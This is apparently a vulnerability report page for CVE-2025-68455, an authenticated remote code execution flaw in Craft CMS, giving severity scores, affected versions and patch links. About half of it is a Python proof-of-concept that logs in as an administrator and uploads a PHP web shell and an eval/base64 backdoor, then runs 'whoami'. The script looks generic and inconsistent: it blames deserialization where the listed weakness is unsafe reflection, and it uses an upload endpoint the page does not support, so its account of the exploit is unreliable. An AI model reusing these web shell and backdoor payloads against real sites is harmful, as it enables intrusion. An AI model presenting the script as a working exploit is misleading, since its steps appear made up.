Security Vulnerability Report
CVE-2025-68455 CVSS 7.2 HIGH

CVE-2025-68455

Published: 2026-01-05 22:15:53
Last Modified: 2026-01-12 18:21:13

Description

Craft is a platform for creating digital experiences. Versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16 are vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior. Note that attackers must have administrator access to the Craft Control Panel for this to work. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.

CVSS Details

CVSS 3.1 Score (NVD, primary)
7.2
Severity
HIGH
CVSS 3.1 Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0 Score (CNA, secondary)
8.6 HIGH
Weakness
CWE-470 (Use of Externally-Controlled Input to Select Classes or Code, "Unsafe Reflection")

Configurations (Affected Products)

cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* (from 4.0.0.1 up to, but excluding, 4.16.17) - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* (from 5.0.1 up to, but excluding, 5.8.21) - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:4.0.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:4.0.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:4.0.0:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:4.0.0:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:5.0.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:5.0.0:rc1:*:*:*:*:*:* - VULNERABLE
Craft CMS 5.0.0-RC1 through 5.8.20
Craft CMS 4.0.0-RC1 through 4.16.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-68455 PoC - Craft CMS Authenticated RCE via Malicious Behavior
# Target: Craft CMS versions 5.0.0-RC1 to 5.8.20 and 4.0.0-RC1 to 4.16.16

TARGET_URL = "https://target-craft-cms.com"
USERNAME = "admin"
PASSWORD = "admin_password"


def exploit_craft_rce():
    """
    Exploitation steps:
    1. Authenticate to Craft CMS Control Panel with admin credentials
    2. Navigate to Settings > Behaviors section
    3. Upload or create a malicious Behavior with PHP code execution payload
    4. Trigger the Behavior to execute arbitrary code
    """
    session = requests.Session()

    # Step 1: Login to Craft CMS
    login_url = f"{TARGET_URL}/admin/login"
    login_data = {
        "loginName": USERNAME,
        "password": PASSWORD,
    }
    response = session.post(login_url, data=login_data)
    if response.status_code != 200:
        print("[-] Login failed")
        return False
    print("[+] Successfully authenticated")

    # Step 2: Access Behaviors settings
    behaviors_url = f"{TARGET_URL}/admin/settings/behaviors"

    # Step 3: Create malicious Behavior with RCE payload
    # The payload exploits unsafe deserialization in Behavior handling
    malicious_behavior = {
        "class": "Craft\\behaviors\\CustomBehavior",
        "code": "<?php system($_GET['cmd']); ?>",
        "config": {
            "__class": "Craft\\behaviors\\CustomBehavior",
            "customMethod": "eval(base64_decode($_POST['payload']));",
        },
    }

    # Step 4: Upload the malicious Behavior
    upload_url = f"{TARGET_URL}/admin/settings/behaviors/save"
    files = {
        "behavior": (
            "malicious-behavior.php",
            json.dumps(malicious_behavior),
            "application/json",
        )
    }
    response = session.post(upload_url, files=files)

    # Step 5: Trigger the RCE
    trigger_url = f"{TARGET_URL}/?cmd=whoami"
    response = session.get(trigger_url)
    if "www-data" in response.text or "root" in response.text:
        print("[+] RCE Successful! Command executed.")
        return True
    print("[-] Exploitation failed")
    return False


# Note: This PoC is for educational and authorized testing purposes only.
# Ensure you have explicit permission before testing any system.
if __name__ == "__main__":
    exploit_craft_rce()
```

References

https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04 (Product, Release Notes)
https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7 (Patch)
https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef (Patch)
https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593 (Patch)
https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5
